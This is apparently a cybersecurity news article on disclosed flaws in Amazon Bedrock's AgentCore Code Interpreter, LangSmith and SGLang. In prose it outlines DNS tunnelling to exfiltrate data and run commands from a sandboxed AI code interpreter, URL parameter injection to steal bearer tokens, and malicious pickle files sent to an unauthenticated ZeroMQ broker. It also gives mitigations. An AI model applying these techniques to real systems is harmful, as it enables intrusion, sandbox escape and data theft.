AI Vulnerabilities in Amazon Bedrock, LangSmith, and SGLang Expose Data to Exfiltration and Remote Code Execution
Recent cybersecurity research has unveiled critical vulnerabilities in prominent artificial intelligence (AI) platforms, raising alarms about potential data exfiltration and remote code execution risks. These vulnerabilities affect Amazon’s Bedrock, LangSmith, and SGLang, highlighting the urgent need for enhanced security measures in AI environments.
Exfiltration Risks in Amazon Bedrock
Cybersecurity firm BeyondTrust has reported a significant flaw in the Amazon Bedrock AgentCore Code Interpreter’s sandbox mode, which allows outbound Domain Name System (DNS) queries. This capability can be exploited by attackers to establish interactive shells and circumvent network isolation protocols. The vulnerability, which lacks a Common Vulnerabilities and Exposures (CVE) identifier, has been assigned a CVSS score of 7.5 out of 10.
The Amazon Bedrock AgentCore Code Interpreter is a fully managed service designed to enable AI agents to execute code securely within isolated sandbox environments. Launched in August 2025, the service was intended to prevent agent workloads from accessing external systems. However, the allowance for DNS queries, even under a “no network access” configuration, poses a significant risk. Kinnaird McQuade, Chief Security Architect at BeyondTrust, noted that this oversight could enable threat actors to create command-and-control channels and exfiltrate data via DNS.
In experimental scenarios, attackers could exploit this vulnerability to set up bidirectional communication channels through DNS queries and responses. If the attacker’s Identity and Access Management (IAM) role permits access to AWS resources, they could exfiltrate sensitive information stored in S3 buckets and execute commands remotely.
Furthermore, the DNS communication mechanism can be manipulated to deliver additional payloads to the Code Interpreter, allowing it to poll DNS command-and-control servers for commands and return results via DNS subdomain queries. This raises concerns about the potential for unauthorized access to sensitive data.
BeyondTrust emphasized that this research illustrates how DNS resolution can undermine the network isolation guarantees of sandboxed code interpreters. The implications of this vulnerability could lead to data breaches, downtime, and the deletion of critical infrastructure.
In response to these findings, Amazon has advised customers to utilize Virtual Private Cloud (VPC) mode instead of sandbox mode for complete network isolation. Additionally, the company recommends implementing a DNS firewall to filter outbound DNS traffic.
LangSmith’s Account Takeover Vulnerability
In a related development, Miggo Security disclosed a high-severity vulnerability in LangSmith, a platform for AI observability. This flaw, identified as CVE-2026-25750 with a CVSS score of 8.5, exposes users to potential token theft and account takeover. The vulnerability affects both self-hosted and cloud deployments and has been addressed in LangSmith version 0.12.71, released in December 2025.
The issue arises from a lack of validation on the baseUrl parameter, allowing attackers to execute URL parameter injection. This could enable them to steal a signed-in user’s bearer token, user ID, and workspace ID by tricking victims into clicking on malicious links.
Successful exploitation could grant unauthorized access to sensitive AI trace histories, internal SQL queries, customer records, and proprietary source code. Researchers from Miggo noted that a logged-in LangSmith user could be compromised simply by visiting an attacker-controlled site or clicking a malicious link.
SGLang’s Unsafe Pickle Deserialization Flaws
Security vulnerabilities have also been identified in SGLang, an open-source framework for serving large language models and multimodal AI models. These vulnerabilities could lead to unsafe pickle deserialization, potentially resulting in remote code execution. Discovered by Orca security researcher Igor Stepansky, these flaws remain unpatched.
Three specific vulnerabilities have been highlighted:
- CVE-2026-3059 (CVSS score: 9.8) – An unauthenticated remote code execution vulnerability through the ZeroMQ broker, which deserializes untrusted data without authentication.
- CVE-2026-3060 (CVSS score: 9.8) – Similar to the first, this vulnerability affects the disaggregation module, allowing unauthenticated remote code execution.
- CVE-2026-3989 (CVSS score: 7.8) – This flaw involves the use of an insecure pickle.load() function without proper validation, which can be exploited by providing a malicious pickle file.
The CERT Coordination Center has stated that if either of the first two conditions is met, an attacker could exploit the vulnerability by sending a malicious pickle file to the broker, which would then deserialize it.
Users of SGLang are advised to restrict access to service interfaces and ensure they are not exposed to untrusted networks. Implementing adequate network segmentation and access controls is crucial to prevent unauthorized interactions with ZeroMQ endpoints.
While there is currently no evidence that these vulnerabilities have been exploited in the wild, vigilance is necessary. Monitoring for unexpected inbound TCP connections to the ZeroMQ broker port, unusual child processes spawned by the SGLang Python process, and unexpected outbound connections is recommended.
The implications of these vulnerabilities extend beyond individual platforms, highlighting the need for robust security practices in AI development and deployment. As AI technologies become increasingly integrated into business operations, ensuring their security is paramount.
According to publicly available reporting, the vulnerabilities in Amazon Bedrock, LangSmith, and SGLang underscore the critical importance of maintaining rigorous security protocols in AI environments.
Follow the latest cybersecurity developments, threat intelligence and breaking updates from across the Middle East.


